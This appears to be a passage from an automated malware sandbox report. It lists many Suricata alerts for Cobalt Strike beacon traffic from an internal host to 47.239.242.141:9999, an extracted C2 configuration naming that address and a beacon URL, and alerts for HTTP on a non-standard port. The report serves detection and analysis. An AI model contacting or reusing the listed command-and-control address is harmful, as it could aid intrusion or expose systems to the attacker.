Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54190 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54226 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54067 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54157 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54235 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54174 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54249 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54255 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54137 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54241 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54264 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54271 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54287 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54295 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54310 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54318 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54319 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54301 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54322 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54323 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54320 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54325 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54328 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54326 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54330 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54278 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54333 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54337 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54338 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54335 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54344 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54349 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54345 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54347 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54346 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54321 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54342 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54331 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54357 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54332 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54355 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54348 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54354 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54343 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54339 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54361 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54369 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54362 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54324 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54371 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54350 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54374 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54377 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54334 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54372 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54376 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54370 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54373 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54327 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54353 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54389 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54379 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54356 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54400 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54375 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54380 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54399 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54406 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54359 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54358 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54396 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54383 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54403 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54382 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54340 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54397 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54385 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54418 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54420 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54401 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54367 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54363 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54422 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54430 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54431 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54395 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54417 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54398 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54364 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54378 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54429 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54414 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54408 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54341 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54415 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54454 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54438 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54413 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54402 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54441 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54329 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54445 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54386 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54440 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54435 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54387 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54416 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54432 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54365 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54442 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54446 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54443 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54336 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54436 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54392 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54448 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54352 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54384 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54427 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54419 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54390 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54407 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54421 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54388 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54351 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54393 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54450 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54426 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54412 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54444 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54360 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54434 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54404 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54391 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54449 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54405 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54433 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54410 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54437 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54366 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54447 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54452 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54368 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54451 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54423 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54425 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54455 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54411 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54453 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54439 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54409 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54381 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54394 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54424 -> 47.239.242.141:9999
Source: Network traffic	Suricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:54428 -> 47.239.242.141:9999

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: 47.239.242.141
Source: Malware configuration extractor	URLs: http://47.239.242.141/BQPy

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 57241 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57241
Source: unknown	Network traffic detected: HTTP traffic on port 57242 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57242
Source: unknown	Network traffic detected: HTTP traffic on port 57243 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57243
Source: unknown	Network traffic detected: HTTP traffic on port 57244 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57244
Source: unknown	Network traffic detected: HTTP traffic on port 57245 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57245
Source: unknown	Network traffic detected: HTTP traffic on port 57246 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57246
Source: unknown	Network traffic detected: HTTP traffic on port 57247 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57247
Source: unknown	Network traffic detected: HTTP traffic on port 57248 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57248
Source: unknown	Network traffic detected: HTTP traffic on port 57249 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57249
Source: unknown	Network traffic detected: HTTP traffic on port 57250 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57250
Source: unknown	Network traffic detected: HTTP traffic on port 57251 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57251
Source: unknown	Network traffic detected: HTTP traffic on port 57252 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57252
Source: unknown	Network traffic detected: HTTP traffic on port 57253 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57253
Source: unknown	Network traffic detected: HTTP traffic on port 57254 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57254
Source: unknown	Network traffic detected: HTTP traffic on port 57255 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57255
Source: unknown	Network traffic detected: HTTP traffic on port 57256 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57256
Source: unknown	Network traffic detected: HTTP traffic on port 57257 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57257
Source: unknown	Network traffic detected: HTTP traffic on port 57258 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57258
Source: unknown	Network traffic detected: HTTP traffic on port 57259 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57259
Source: unknown	Network traffic detected: HTTP traffic on port 57260 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57260
Source: unknown	Network traffic detected: HTTP traffic on port 57261 -> 9999
Source: unknown	Network traffic detected: HTTP traffic on port 9999 -> 57261
